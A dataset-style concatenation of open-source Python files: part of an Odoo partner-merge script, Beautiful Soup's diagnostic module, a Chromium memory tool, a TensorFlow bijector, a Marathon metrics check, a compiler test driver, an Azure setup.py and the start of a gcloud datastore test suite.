ON p.id = a.partner_id AND a.state in ('open','paid')
WHERE p.grade_id is NOT NULL
GROUP BY p.id
ORDER BY COUNT(a.id) DESC
""")
re_email = re.compile(r".*@")
for id, email in cr.fetchall():
# check email domain
email = re_email.sub("@", email or "")
if not email or email in partner_treated:
continue
partner_treated.append(email)
# don't update the partners if they are more of one who have invoice
cr.execute(""" SELECT *
FROM res_partner as p
WHERE p.id != %s AND p.email LIKE %s AND
EXISTS (SELECT * FROM account_invoice as a WHERE p.id = a.partner_id AND a.state in ('open','paid'))
""", (id, '%' + email))
if len(cr.fetchall()) > 1:
_logger.info("%s MORE OF ONE COMPANY", email)
continue
# to display changed values
cr.execute(""" SELECT id,email
FROM res_partner
WHERE parent_id != %s AND id != %s AND email LIKE %s
""", (id, id, '%' + email))
_logger.info("%r", cr.fetchall())
# upgrade
cr.execute(""" UPDATE res_partner
SET parent_id = %s
WHERE id != %s AND email LIKE %s
""", (id, id, '%' + email))
return False
| gpl-3.0 |
MarkWh1te/xueqiu_predict | p3_env/lib/python3.5/site-packages/bs4/diagnose.py | 23 | 6773 | """Diagnostic functions, mainly for use when doing tech support."""
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
__license__ = "MIT"
import cProfile
from io import StringIO
from html.parser import HTMLParser
import bs4
from bs4 import BeautifulSoup, __version__
from bs4.builder import builder_registry
import os
import pstats
import random
import tempfile
import time
import traceback
import sys
import cProfile
def diagnose(data):
"""Diagnostic suite for isolating common problems."""
print("Diagnostic running on Beautiful Soup %s" % __version__)
print("Python version %s" % sys.version)
basic_parsers = ["html.parser", "html5lib", "lxml"]
for name in basic_parsers:
for builder in builder_registry.builders:
if name in builder.features:
break
else:
basic_parsers.remove(name)
print((
"I noticed that %s is not installed. Installing it may help." %
name))
if 'lxml' in basic_parsers:
basic_parsers.append(["lxml", "xml"])
try:
from lxml import etree
print("Found lxml version %s" % ".".join(map(str,etree.LXML_VERSION)))
except ImportError as e:
print (
"lxml is not installed or couldn't be imported.")
if 'html5lib' in basic_parsers:
try:
import html5lib
print("Found html5lib version %s" % html5lib.__version__)
except ImportError as e:
print (
"html5lib is not installed or couldn't be imported.")
if hasattr(data, 'read'):
data = data.read()
elif os.path.exists(data):
print('"%s" looks like a filename. Reading data from the file.' % data)
with open(data) as fp:
data = fp.read()
elif data.startswith("http:") or data.startswith("https:"):
print('"%s" looks like a URL. Beautiful Soup is not an HTTP client.' % data)
print("You need to use some other library to get the document behind the URL, and feed that document to Beautiful Soup.")
return
print()
for parser in basic_parsers:
print("Trying to parse your markup with %s" % parser)
success = False
try:
soup = BeautifulSoup(data, parser)
success = True
except Exception as e:
print("%s could not parse the markup." % parser)
traceback.print_exc()
if success:
print("Here's what %s did with the markup:" % parser)
print(soup.prettify())
print("-" * 80)
def lxml_trace(data, html=True, **kwargs):
"""Print out the lxml events that occur during parsing.
This lets you see how lxml parses a document when no Beautiful
Soup code is running.
"""
from lxml import etree
for event, element in etree.iterparse(StringIO(data), html=html, **kwargs):
print(("%s, %4s, %s" % (event, element.tag, element.text)))
class AnnouncingParser(HTMLParser):
"""Announces HTMLParser parse events, without doing anything else."""
def _p(self, s):
print(s)
def handle_starttag(self, name, attrs):
self._p("%s START" % name)
def handle_endtag(self, name):
self._p("%s END" % name)
def handle_data(self, data):
self._p("%s DATA" % data)
def handle_charref(self, name):
self._p("%s CHARREF" % name)
def handle_entityref(self, name):
self._p("%s ENTITYREF" % name)
def handle_comment(self, data):
self._p("%s COMMENT" % data)
def handle_decl(self, data):
self._p("%s DECL" % data)
def unknown_decl(self, data):
self._p("%s UNKNOWN-DECL" % data)
def handle_pi(self, data):
self._p("%s PI" % data)
def htmlparser_trace(data):
"""Print out the HTMLParser events that occur during parsing.
This lets you see how HTMLParser parses a document when no
Beautiful Soup code is running.
"""
parser = AnnouncingParser()
parser.feed(data)
_vowels = "aeiou"
_consonants = "bcdfghjklmnpqrstvwxyz"
def rword(length=5):
"Generate a random word-like string."
s = ''
for i in range(length):
if i % 2 == 0:
t = _consonants
else:
t = _vowels
s += random.choice(t)
return s
def rsentence(length=4):
"Generate a random sentence-like string."
return " ".join(rword(random.randint(4,9)) for i in range(length))
def rdoc(num_elements=1000):
"""Randomly generate an invalid HTML document."""
tag_names = ['p', 'div', 'span', 'i', 'b', 'script', 'table']
elements = []
for i in range(num_elements):
choice = random.randint(0,3)
if choice == 0:
# New tag.
tag_name = random.choice(tag_names)
elements.append("<%s>" % tag_name)
elif choice == 1:
elements.append(rsentence(random.randint(1,4)))
elif choice == 2:
# Close a tag.
tag_name = random.choice(tag_names)
elements.append("</%s>" % tag_name)
return "<html>" + "\n".join(elements) + "</html>"
def benchmark_parsers(num_elements=100000):
"""Very basic head-to-head performance benchmark."""
print("Comparative parser benchmark on Beautiful Soup %s" % __version__)
data = rdoc(num_elements)
print("Generated a large invalid HTML document (%d bytes)." % len(data))
for parser in ["lxml", ["lxml", "html"], "html5lib", "html.parser"]:
success = False
try:
a = time.time()
soup = BeautifulSoup(data, parser)
b = time.time()
success = True
except Exception as e:
print("%s could not parse the markup." % parser)
traceback.print_exc()
if success:
print("BS4+%s parsed the markup in %.2fs." % (parser, b-a))
from lxml import etree
a = time.time()
etree.HTML(data)
b = time.time()
print("Raw lxml parsed the markup in %.2fs." % (b-a))
import html5lib
parser = html5lib.HTMLParser()
a = time.time()
parser.parse(data)
b = time.time()
print("Raw html5lib parsed the markup in %.2fs." % (b-a))
def profile(num_elements=100000, parser="lxml"):
filehandle = tempfile.NamedTemporaryFile()
filename = filehandle.name
data = rdoc(num_elements)
vars = dict(bs4=bs4, data=data, parser=parser)
cProfile.runctx('bs4.BeautifulSoup(data, parser)' , vars, vars, filename)
stats = pstats.Stats(filename)
# stats.strip_dirs()
stats.sort_stats("cumulative")
stats.print_stats('_html5lib|bs4', 50)
if __name__ == '__main__':
diagnose(sys.stdin.read())
| mit |
sgraham/nope | tools/multi_process_rss.py | 128 | 3646 | #!/usr/bin/env python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# Counts a resident set size (RSS) of multiple processes without double-counts.
# If they share the same page frame, the page frame is counted only once.
#
# Usage:
# ./multi-process-rss.py <pid>|<pid>r [...]
#
# If <pid> has 'r' at the end, all descendants of the process are accounted.
#
# Example:
# ./multi-process-rss.py 12345 23456r
#
# The command line above counts the RSS of 1) process 12345, 2) process 23456
# and 3) all descendant processes of process 23456.
import collections
import logging
import os
import psutil
import sys
if sys.platform.startswith('linux'):
_TOOLS_PATH = os.path.dirname(os.path.abspath(__file__))
_TOOLS_LINUX_PATH = os.path.join(_TOOLS_PATH, 'linux')
sys.path.append(_TOOLS_LINUX_PATH)
import procfs # pylint: disable=F0401
class _NullHandler(logging.Handler):
def emit(self, record):
pass
_LOGGER = logging.getLogger('multi-process-rss')
_LOGGER.addHandler(_NullHandler())
def _recursive_get_children(pid):
try:
children = psutil.Process(pid).get_children()
except psutil.error.NoSuchProcess:
return []
descendant = []
for child in children:
descendant.append(child.pid)
descendant.extend(_recursive_get_children(child.pid))
return descendant
def list_pids(argv):
pids = []
for arg in argv[1:]:
try:
if arg.endswith('r'):
recursive = True
pid = int(arg[:-1])
else:
recursive = False
pid = int(arg)
except ValueError:
raise SyntaxError("%s is not an integer." % arg)
else:
pids.append(pid)
if recursive:
children = _recursive_get_children(pid)
pids.extend(children)
pids = sorted(set(pids), key=pids.index) # uniq: maybe slow, but simple.
return pids
def count_pageframes(pids):
pageframes = collections.defaultdict(int)
pagemap_dct = {}
for pid in pids:
maps = procfs.ProcMaps.load(pid)
if not maps:
_LOGGER.warning('/proc/%d/maps not found.' % pid)
continue
pagemap = procfs.ProcPagemap.load(pid, maps)
if not pagemap:
_LOGGER.warning('/proc/%d/pagemap not found.' % pid)
continue
pagemap_dct[pid] = pagemap
for pid, pagemap in pagemap_dct.iteritems():
for vma in pagemap.vma_internals.itervalues():
for pageframe, number in vma.pageframes.iteritems():
pageframes[pageframe] += number
return pageframes
def count_statm(pids):
resident = 0
shared = 0
private = 0
for pid in pids:
statm = procfs.ProcStatm.load(pid)
if not statm:
_LOGGER.warning('/proc/%d/statm not found.' % pid)
continue
resident += statm.resident
shared += statm.share
private += (statm.resident - statm.share)
return (resident, shared, private)
def main(argv):
logging_handler = logging.StreamHandler()
logging_handler.setLevel(logging.WARNING)
logging_handler.setFormatter(logging.Formatter(
'%(asctime)s:%(name)s:%(levelname)s:%(message)s'))
_LOGGER.setLevel(logging.WARNING)
_LOGGER.addHandler(logging_handler)
if sys.platform.startswith('linux'):
logging.getLogger('procfs').setLevel(logging.WARNING)
logging.getLogger('procfs').addHandler(logging_handler)
pids = list_pids(argv)
pageframes = count_pageframes(pids)
else:
_LOGGER.error('%s is not supported.' % sys.platform)
return 1
# TODO(dmikurube): Classify this total RSS.
print len(pageframes) * 4096
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv))
| bsd-3-clause |
benoitsteiner/tensorflow-opencl | tensorflow/contrib/distributions/python/ops/bijectors/absolute_value_impl.py | 12 | 4575 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""AbsoluteValue bijector."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops.distributions import bijector
__all__ = [
"AbsoluteValue",
]
class AbsoluteValue(bijector.Bijector):
"""Computes `Y = g(X) = Abs(X)`, element-wise.
This non-injective bijector allows for transformations of scalar distributions
with the absolute value function, which maps `(-inf, inf)` to `[0, inf)`.
* For `y in (0, inf)`, `AbsoluteValue.inverse(y)` returns the set inverse
`{x in (-inf, inf) : |x| = y}` as a tuple, `-y, y`.
* `AbsoluteValue.inverse(0)` returns `0, 0`, which is not the set inverse
(the set inverse is the singleton `{0}`), but "works" in conjunction with
`TransformedDistribution` to produce a left semi-continuous pdf.
* For `y < 0`, `AbsoluteValue.inverse(y)` happily returns the
wrong thing, `-y, y`. This is done for efficiency. If
`validate_args == True`, `y < 0` will raise an exception.
```python
abs = ds.bijectors.AbsoluteValue()
abs.forward([-1., 0., 1.])
==> [1., 0., 1.]
abs.inverse(1.)
==> [-1., 1.]
# The |dX/dY| is constant, == 1. So Log|dX/dY| == 0.
abs.inverse_log_det_jacobian(1.)
==> [0., 0.]
# Special case handling of 0.
abs.inverse(0.)
==> [0., 0.]
abs.inverse_log_det_jacobian(0.)
==> [0., 0.]
```
"""
def __init__(self, event_ndims=0, validate_args=False, name="absolute_value"):
"""Instantiates the `AbsoluteValue` bijector.
Args:
event_ndims: Python scalar indicating the number of dimensions associated
with a particular draw from the distribution. Currently only zero is
supported.
validate_args: Python `bool` indicating whether arguments should be
checked for correctness, in particular whether inputs to `inverse` and
`inverse_log_det_jacobian` are non-negative.
name: Python `str` name given to ops managed by this object.
Raises:
ValueError: If `event_ndims` is not zero.
"""
self._graph_parents = []
self._name = name
event_ndims = ops.convert_to_tensor(event_ndims, name="event_ndims")
event_ndims_const = tensor_util.constant_value(event_ndims)
if event_ndims_const is not None and event_ndims_const not in (0,):
raise ValueError("event_ndims(%s) was not 0" % event_ndims_const)
else:
if validate_args:
event_ndims = control_flow_ops.with_dependencies(
[check_ops.assert_equal(
event_ndims, 0, message="event_ndims was not 0")],
event_ndims)
with self._name_scope("init"):
super(AbsoluteValue, self).__init__(
event_ndims=event_ndims,
validate_args=validate_args,
name=name)
def _forward(self, x):
return math_ops.abs(x)
def _inverse(self, y):
if self.validate_args:
y = control_flow_ops.with_dependencies(
[check_ops.assert_non_negative(y, message="Argument y was negative")],
y)
return -y, y
def _inverse_log_det_jacobian(self, y):
# If event_ndims = 2,
# F^{-1}(y) = (-y, y), so DF^{-1}(y) = (-1, 1),
# so Log|DF^{-1}(y)| = Log[1, 1] = [0, 0].
batch_shape = array_ops.shape(y)[:array_ops.rank(y) - self.event_ndims]
zeros = array_ops.zeros(batch_shape, dtype=y.dtype)
if self.validate_args:
zeros = control_flow_ops.with_dependencies(
[check_ops.assert_non_negative(y, message="Argument y was negative")],
zeros)
return zeros, zeros
@property
def _is_injective(self):
return False
| apache-2.0 |
StackVista/sts-agent-integrations-core | marathon/check.py | 1 | 8521 |
# stdlib
from urlparse import urljoin
# 3rd party
import requests
# project
from checks import AgentCheck
from config import _is_affirmative
class Marathon(AgentCheck):
DEFAULT_TIMEOUT = 5
SERVICE_CHECK_NAME = 'marathon.can_connect'
ACS_TOKEN = None
APP_METRICS = [
'backoffFactor',
'backoffSeconds',
'cpus',
'disk',
'instances',
'mem',
'taskRateLimit',
'tasksRunning',
'tasksStaged',
'tasksHealthy',
'tasksUnhealthy'
]
QUEUE_METRICS = {
'count': (None, 'count'),
'delay': ('timeLeftSeconds', 'delay'),
'processedOffersSummary': [
('processedOffersCount', 'offers.processed'),
('unusedOffersCount', 'offers.unused'),
('rejectSummaryLastOffers', 'offers.reject.last'),
('rejectSummaryLaunchAttempt', 'offers.reject.launch'),
]
}
def check(self, instance):
try:
url, auth, acs_url, ssl_verify, group, instance_tags, timeout = self.get_instance_config(instance)
except Exception as e:
self.log.error("Invalid instance configuration.")
raise e
self.process_apps(url, timeout, auth, acs_url, ssl_verify, instance_tags, group)
self.process_deployments(url, timeout, auth, acs_url, ssl_verify, instance_tags)
self.process_queues(url, timeout, auth, acs_url, ssl_verify, instance_tags)
def refresh_acs_token(self, auth, acs_url):
try:
auth_body = {
'uid': auth[0],
'password': auth[1]
}
r = requests.post(urljoin(acs_url, "acs/api/v1/auth/login"), json=auth_body, verify=False)
r.raise_for_status()
token = r.json()['token']
self.ACS_TOKEN = token
return token
except requests.exceptions.HTTPError:
self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.CRITICAL,
message='acs auth url %s returned a status of %s' % (acs_url, r.status_code),
tags = ["url:{0}".format(acs_url)])
raise Exception("Got %s when hitting %s" % (r.status_code, acs_url))
def get_json(self, url, timeout, auth, acs_url, verify):
params = {
'timeout': timeout,
'headers': {},
'auth': auth,
'verify': verify
}
if acs_url:
# If the ACS token has not been set, go get it
if not self.ACS_TOKEN:
self.refresh_acs_token(auth, acs_url)
params['headers']['authorization'] = 'token=%s' % self.ACS_TOKEN
del params['auth']
try:
r = requests.get(url, **params)
# If got unauthorized and using acs auth, refresh the token and try again
if r.status_code == 401 and acs_url:
self.refresh_acs_token(auth, acs_url)
r = requests.get(url, **params)
r.raise_for_status()
except requests.exceptions.Timeout:
# If there's a timeout
self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.CRITICAL,
message='%s timed out after %s seconds.' % (url, timeout),
tags = ["url:{0}".format(url)])
raise Exception("Timeout when hitting %s" % url)
except requests.exceptions.HTTPError:
self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.CRITICAL,
message='%s returned a status of %s' % (url, r.status_code),
tags = ["url:{0}".format(url)])
raise Exception("Got %s when hitting %s" % (r.status_code, url))
except requests.exceptions.ConnectionError:
self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.CRITICAL,
message='%s Connection Refused.' % (url),
tags = ["url:{0}".format(url)])
raise Exception("Connection refused when hitting %s" % url)
else:
self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.OK,
tags = ["url:{0}".format(url)])
return r.json()
def get_instance_config(self, instance):
if 'url' not in instance:
raise Exception('Marathon instance missing "url" value.')
# Load values from the instance config
url = instance['url']
user = instance.get('user')
password = instance.get('password')
acs_url = instance.get('acs_url')
if user is not None and password is not None:
auth = (user,password)
else:
auth = None
ssl_verify = not _is_affirmative(instance.get('disable_ssl_validation', False))
group = instance.get('group', None)
tags = instance.get('tags', [])
default_timeout = self.init_config.get('default_timeout', self.DEFAULT_TIMEOUT)
timeout = float(instance.get('timeout', default_timeout))
return url, auth, acs_url, ssl_verify, group, tags, timeout
def process_apps(self, url, timeout, auth, acs_url, ssl_verify, tags=None, group=None):
# Marathon apps
if group is None:
marathon_path = urljoin(url, "v2/apps")
else:
marathon_path = urljoin(url, "v2/groups/{}".format(group))
response = self.get_json(marathon_path, timeout, auth, acs_url, ssl_verify)
if response is not None:
self.gauge('marathon.apps', len(response['apps']), tags=tags)
for app in response['apps']:
tags = ['app_id:' + app['id'], 'version:' + app['version']] + tags
for attr in self.APP_METRICS:
if attr in app:
self.gauge('marathon.' + attr, app[attr], tags=tags)
def process_deployments(self, url, timeout, auth, acs_url, ssl_verify, tags=None):
# Number of running/pending deployments
response = self.get_json(urljoin(url, "v2/deployments"), timeout, auth, acs_url, ssl_verify)
if response is not None:
self.gauge('marathon.deployments', len(response), tags=tags)
def process_queues(self, url, timeout, auth, acs_url, ssl_verify, tags=None):
# Number of queued applications
QUEUE_PREFIX = 'marathon.queue'
response = self.get_json(urljoin(url, "v2/queue"), timeout, auth, acs_url, ssl_verify)
if response is None:
return
self.gauge('{}.size'.format(QUEUE_PREFIX), len(response['queue']), tags=tags)
for queue in response['queue']:
q_tags = ['app_id:' + queue['app']['id'], 'version:' + queue['app']['version']] + tags
for m_type, sub_metric in self.QUEUE_METRICS.iteritems():
if isinstance(sub_metric, list):
for attr, name in sub_metric:
try:
metric_name = '{}.{}'.format(QUEUE_PREFIX, name)
_attr = queue[m_type][attr]
if 'Summary' in attr:
for reject in _attr:
reason = reject['reason']
declined = reject['declined']
processed = reject['processed']
summary_tags = q_tags + ['reason:{}'.format(reason)]
self.gauge(metric_name, declined, tags=summary_tags + ['status:declined'])
self.gauge(metric_name, processed, tags=summary_tags + ['status:processed'])
else:
val = float(_attr)
self.gauge(metric_name, val, tags=q_tags)
except (KeyError, TypeError):
self.log.warn("Metric unavailable skipping: {}".format(metric_name))
else:
try:
attr, name = sub_metric
metric_name = '{}.{}'.format(QUEUE_PREFIX, name)
_attr = queue[m_type][attr] if attr else queue[m_type]
val = float(_attr)
self.gauge(metric_name, val, tags=q_tags)
except (KeyError, TypeError):
self.log.warn("Metric unavailable skipping: {}".format(metric_name))
| bsd-3-clause |
LJMNilsson/memtran | src/test_type_checking.py | 1 | 5023 | # Copyright (C) 2017 Martin Nilsson
# This file is part of the Memtran compiler.
#
# The Memtran compiler is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# The Memtran compiler is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with the Memtran compiler. If not, see http://www.gnu.org/licenses/ .
import util
from tokens import *
import lexer
import ast
import parser
import end_expansion
import name_mangler
import type_collection
import fun_collection # also collects templates, unspecialized
import built_in_functions_stuff
import slot_collection
import type_inference_and_annotation
util.currentFileName = "typecheckingtest.mtr"
toks = lexer.lex_file("typecheckingtest.mtr")
if toks != False:
print("LEXING SUCCESSFUL!")
# Print the tokens:
for it in toks:
it.print_it()
print(" ", end='')
print("") # newline
print("")
parseResult = parser.parse_program(toks, [])
if parseResult != None:
print("PARSING SUCCESSFUL!")
parseResult.print_it()
print("") # newline
print("") # newline
success = end_expansion.run_pass(parseResult)
if success:
print("END EXPANSION SUCCESSFUL!")
parseResult.print_it()
print("") # newline
mangledModuleName = name_mangler.mangle_basic_name("typecheckingtest")
# TODO: parse and collect module .mh header files here
directlyImportedTypesDictDict = {}
otherImportedModulesTypeDictDict = {} # should be a dict of dicts
directlyImportedFunsDictDict = {} # these two also contain slot declarations, despite the naming -- sorted per directly imported module
otherImportedModulesFunDictDict = {}
typeDict = type_collection.gather(parseResult, mangledModuleName, directlyImportedTypesDictDict)
if not (typeDict == False):
print("TYPE COLLECTION SUCCESSFUL!")
print(typeDict)
success = type_collection.check(typeDict, directlyImportedTypesDictDict, otherImportedModulesTypeDictDict)
if success:
print("NAMED TYPE SIGNATURE CHECKING SUCCESSFUL!")
blockNumberList = [] # Initial value. Created by fun_collection pass. To be used again with template specialisation!!! NOTE: ??
funDict = fun_collection.run_pass(parseResult, mangledModuleName, blockNumberList, typeDict, directlyImportedTypesDictDict)
if not (funDict == False):
print("FUNCTION COLLECTION SUCCESSFUL!")
for key, value in funDict.items():
print(key, end='')
print(": ", end='')
value.print_it()
print("") # newline
slotBlockNumberList = [] # should hopefully become the same as 'blockNumberList' as we recurse in the same way...
success = slot_collection.run_pass(
parseResult, funDict, mangledModuleName, slotBlockNumberList,
typeDict, directlyImportedTypesDictDict, otherImportedModulesTypeDictDict,
built_in_functions_stuff.builtInFunsDict,
directlyImportedFunsDictDict, otherImportedModulesFunDictDict
)
if success:
print("SLOT COLLECTION SUCCESSFUL!")
for key, value in funDict.items():
print(key, end='')
print(": ", end='')
value.print_it()
print("") # newline
success = type_inference_and_annotation.run_pass(
parseResult,
typeDict, directlyImportedTypesDictDict, otherImportedModulesTypeDictDict,
funDict, built_in_functions_stuff.builtInFunsDict, directlyImportedFunsDictDict, otherImportedModulesFunDictDict
)
if success:
print("TYPE CHECKING SUCCESSFUL!")
| gpl-3.0 |
lmazuel/azure-sdk-for-python | azure-mgmt-managementpartner/setup.py | 1 | 2791 | #!/usr/bin/env python
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
import re
import os.path
from io import open
from setuptools import find_packages, setup
try:
from azure_bdist_wheel import cmdclass
except ImportError:
from distutils import log as logger
logger.warn("Wheel is not available, disabling bdist_wheel hook")
cmdclass = {}
# Change the PACKAGE_NAME only to change folder and different name
PACKAGE_NAME = "azure-mgmt-managementpartner"
PACKAGE_PPRINT_NAME = "ManagementPartner Management"
# a-b-c => a/b/c
package_folder_path = PACKAGE_NAME.replace('-', '/')
# a-b-c => a.b.c
namespace_name = PACKAGE_NAME.replace('-', '.')
# azure v0.x is not compatible with this package
# azure v0.x used to have a __version__ attribute (newer versions don't)
try:
import azure
try:
ver = azure.__version__
raise Exception(
'This package is incompatible with azure=={}. '.format(ver) +
'Uninstall it with "pip uninstall azure".'
)
except AttributeError:
pass
except ImportError:
pass
# Version extraction inspired from 'requests'
with open(os.path.join(package_folder_path, 'version.py'), 'r') as fd:
version = re.search(r'^VERSION\s*=\s*[\'"]([^\'"]*)[\'"]',
fd.read(), re.MULTILINE).group(1)
if not version:
raise RuntimeError('Cannot find version information')
with open('README.rst', encoding='utf-8') as f:
readme = f.read()
with open('HISTORY.rst', encoding='utf-8') as f:
history = f.read()
setup(
name=PACKAGE_NAME,
version=version,
description='Microsoft Azure {} Client Library for Python'.format(PACKAGE_PPRINT_NAME),
long_description=readme + '\n\n' + history,
license='MIT License',
author='Microsoft Corporation',
author_email='azpysdkhelp@microsoft.com',
url='https://github.com/Azure/azure-sdk-for-python',
classifiers=[
'Development Status :: 4 - Beta',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'License :: OSI Approved :: MIT License',
],
zip_safe=False,
packages=find_packages(exclude=["tests"]),
install_requires=[
'msrestazure>=0.4.20,<2.0.0',
'azure-common~=1.1',
],
cmdclass=cmdclass
)
| mit |
quoclieu/codebrew17-starving | env/lib/python3.5/site-packages/gcloud/datastore/test_client.py | 6 | 34078 | # Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest2
def _make_entity_pb(project, kind, integer_id, name=None, str_val=None):
from gcloud.datastore._generated import entity_pb2
from gcloud.datastore.helpers import _new_value_pb
entity_pb = entity_pb2.Entity()
entity_pb.key.partition_id.project_id = project
path_element = entity_pb.key.path.add()
path_element.kind = kind
path_element.id = integer_id
if name is not None and str_val is not None:
value_pb = _new_value_pb(entity_pb, name)
value_pb.string_value = str_val
return entity_pb
class Test__get_gcd_project(unittest2.TestCase):
def _callFUT(self):
from gcloud.datastore.client import _get_gcd_project
return _get_gcd_project()
def test_no_value(self):
import os
from gcloud._testing import _Monkey
environ = {}
with _Monkey(os, getenv=environ.get):
project = self._callFUT()
self.assertEqual(project, None)
def test_value_set(self):
import os
from gcloud._testing import _Monkey
from gcloud.datastore.client import GCD_DATASET
MOCK_PROJECT = object()
environ = {GCD_DATASET: MOCK_PROJECT}
with _Monkey(os, getenv=environ.get):
project = self._callFUT()
self.assertEqual(project, MOCK_PROJECT)
class Test__determine_default_project(unittest2.TestCase):
def _callFUT(self, project=None):
from gcloud.datastore.client import (
_determine_default_project)
return _determine_default_project(project=project)
def _determine_default_helper(self, gcd=None, fallback=None,
project_called=None):
from gcloud._testing import _Monkey
from gcloud.datastore import client
_callers = []
def gcd_mock():
_callers.append('gcd_mock')
return gcd
def fallback_mock(project=None):
_callers.append(('fallback_mock', project))
return fallback
patched_methods = {
'_get_gcd_project': gcd_mock,
'_base_default_project': fallback_mock,
}
with _Monkey(client, **patched_methods):
returned_project = self._callFUT(project_called)
return returned_project, _callers
def test_no_value(self):
project, callers = self._determine_default_helper()
self.assertEqual(project, None)
self.assertEqual(callers, ['gcd_mock', ('fallback_mock', None)])
def test_explicit(self):
PROJECT = object()
project, callers = self._determine_default_helper(
project_called=PROJECT)
self.assertEqual(project, PROJECT)
self.assertEqual(callers, [])
def test_gcd(self):
PROJECT = object()
project, callers = self._determine_default_helper(gcd=PROJECT)
self.assertEqual(project, PROJECT)
self.assertEqual(callers, ['gcd_mock'])
def test_fallback(self):
PROJECT = object()
project, callers = self._determine_default_helper(fallback=PROJECT)
self.assertEqual(project, PROJECT)
self.assertEqual(callers, ['gcd_mock', ('fallback_mock', None)])
class TestClient(unittest2.TestCase):
PROJECT = 'PROJECT'
def setUp(self):
KLASS = self._getTargetClass()
self.original_cnxn_class = KLASS._connection_class
KLASS._connection_class = _MockConnection
def tearDown(self):
KLASS = self._getTargetClass()
KLASS._connection_class = self.original_cnxn_class
def _getTargetClass(self):
from gcloud.datastore.client import Client
return Client
def _makeOne(self, project=PROJECT, namespace=None,
credentials=None, http=None):
return self._getTargetClass()(project=project,
namespace=namespace,
credentials=credentials,
http=http)
def test_ctor_w_project_no_environ(self):
from gcloud._testing import _Monkey
from gcloud.datastore import client as _MUT
# Some environments (e.g. AppVeyor CI) run in GCE, so
# this test would fail artificially.
with _Monkey(_MUT, _base_default_project=lambda project: None):
self.assertRaises(EnvironmentError, self._makeOne, None)
def test_ctor_w_implicit_inputs(self):
from gcloud._testing import _Monkey
from gcloud.datastore import client as _MUT
from gcloud import client as _base_client
OTHER = 'other'
creds = object()
default_called = []
def fallback_mock(project):
default_called.append(project)
return project or OTHER
klass = self._getTargetClass()
with _Monkey(_MUT,
_determine_default_project=fallback_mock):
with _Monkey(_base_client,
get_credentials=lambda: creds):
client = klass()
self.assertEqual(client.project, OTHER)
self.assertEqual(client.namespace, None)
self.assertTrue(isinstance(client.connection, _MockConnection))
self.assertTrue(client.connection.credentials is creds)
self.assertTrue(client.connection.http is None)
self.assertTrue(client.current_batch is None)
self.assertTrue(client.current_transaction is None)
self.assertEqual(default_called, [None])
def test_ctor_w_explicit_inputs(self):
OTHER = 'other'
NAMESPACE = 'namespace'
creds = object()
http = object()
client = self._makeOne(project=OTHER,
namespace=NAMESPACE,
credentials=creds,
http=http)
self.assertEqual(client.project, OTHER)
self.assertEqual(client.namespace, NAMESPACE)
self.assertTrue(isinstance(client.connection, _MockConnection))
self.assertTrue(client.connection.credentials is creds)
self.assertTrue(client.connection.http is http)
self.assertTrue(client.current_batch is None)
self.assertEqual(list(client._batch_stack), [])
def test__push_batch_and__pop_batch(self):
creds = object()
client = self._makeOne(credentials=creds)
batch = client.batch()
xact = client.transaction()
client._push_batch(batch)
self.assertEqual(list(client._batch_stack), [batch])
self.assertTrue(client.current_batch is batch)
self.assertTrue(client.current_transaction is None)
client._push_batch(xact)
self.assertTrue(client.current_batch is xact)
self.assertTrue(client.current_transaction is xact)
# list(_LocalStack) returns in reverse order.
self.assertEqual(list(client._batch_stack), [xact, batch])
self.assertTrue(client._pop_batch() is xact)
self.assertEqual(list(client._batch_stack), [batch])
self.assertTrue(client._pop_batch() is batch)
self.assertEqual(list(client._batch_stack), [])
def test_get_miss(self):
_called_with = []
def _get_multi(*args, **kw):
_called_with.append((args, kw))
return []
creds = object()
client = self._makeOne(credentials=creds)
client.get_multi = _get_multi
key = object()
self.assertTrue(client.get(key) is None)
self.assertEqual(_called_with[0][0], ())
self.assertEqual(_called_with[0][1]['keys'], [key])
self.assertTrue(_called_with[0][1]['missing'] is None)
self.assertTrue(_called_with[0][1]['deferred'] is None)
self.assertTrue(_called_with[0][1]['transaction'] is None)
def test_get_hit(self):
TXN_ID = '123'
_called_with = []
_entity = object()
def _get_multi(*args, **kw):
_called_with.append((args, kw))
return [_entity]
creds = object()
client = self._makeOne(credentials=creds)
